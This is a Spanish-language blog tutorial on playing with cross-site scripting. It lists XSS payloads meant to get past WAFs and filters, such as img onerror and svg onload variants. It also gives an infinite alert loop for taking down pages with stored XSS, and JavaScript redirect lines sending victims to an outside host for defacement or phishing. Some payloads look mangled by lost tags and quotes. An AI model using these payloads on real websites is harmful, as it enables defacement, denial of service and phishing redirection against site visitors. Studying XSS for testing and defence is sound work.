• LOGIN
  • No hay productos en el carrito.

Cross Site Scripting | Jugando – Parte 1

Ya en otras ocasiones hemos visto la función básica de la vulnerabilidad XSS, desde como se busca, identifica y explota utilizando un sencillo script o payload, con el fin de hacer que el sitio nos muestre una alerta. Para lograr eso, existe infinidad de payloads, que nos permiten vurlar los WAF, los filtros anti-XSS, etc.
Lo que conocemos normalmente es: alert(“XSS”).
De este script, nacen mas con el fin de poder burlar filtros, saltarnos etiquetas html, etc. Por ejemplo tenemos estos:

alert(“XSS”)
“>alert(‘XSS’)

‘”>alert(/XSS/)
“><b>alert(/xss/)</b>
<img src=”x” onerror=”alert(1)””>
‘”><svg/onload=alert(/XSSPOSED/)>
Y un sin fin mas, de payloads. Sin embargo podemos jugar con los alert, aprovechándonos de la programación javascript y teniendo un poco de imaginacion (xD).
Por ejemplo, podemos utilizar un windows confirm.
function redBIRD() { if (confirm(“Selecciona OK”)) { alert(“RedBirdTeam”); }else { alert(“No le diste al OK”); } redBIRD(); } redBIRD();
Jugando un poco, con una victima o con el XSS. Pero aun podemos ir mas lejos, podemos hacer que los alert, sean “infinitos”:
“>for (;;) alert(“Hacked by.Drok3r”)

Defacement & Phishing

Este tipo de script, suele dejar “fuera de servicio” una aplicacion web, que contiene un XSS almacenado, pero gracias a las a nuestros navegadores como lo son Firefox o Chrome, podemos evitar este tipo de ataques.
También podemos llegar a un Defacement con el XSS, sin embargo tiene sus ventajas y desventajas, una de ellas, es que si la vulnerabilidad es reflejada, solo afectara a quien acceda al enlace con el payload, pero si es un xss almacenado, si afecta a cualquiera que acceda a la pagina. Tanto podemos afectar al usuario con un Defacement, podemos redireccionarlo a un phishing del mismo sitio.
Para eso podemos utilizar ya sea que busquemos un defacement o redireccionar a un phishing:
document.location.href = “http://redbird.com/deface.php”;
window.location= “http://redbird.com/deface.php”;
location.assign(“”http://redbird.com/deface.php””);
location.replace(“http://redbird.com/deface.php”);
EJEMPLO:
El ejemplo de arriba, redirecciona a una imagen que dice hacked.
14/04/2018
Instituto de Ciberseguridad © 2018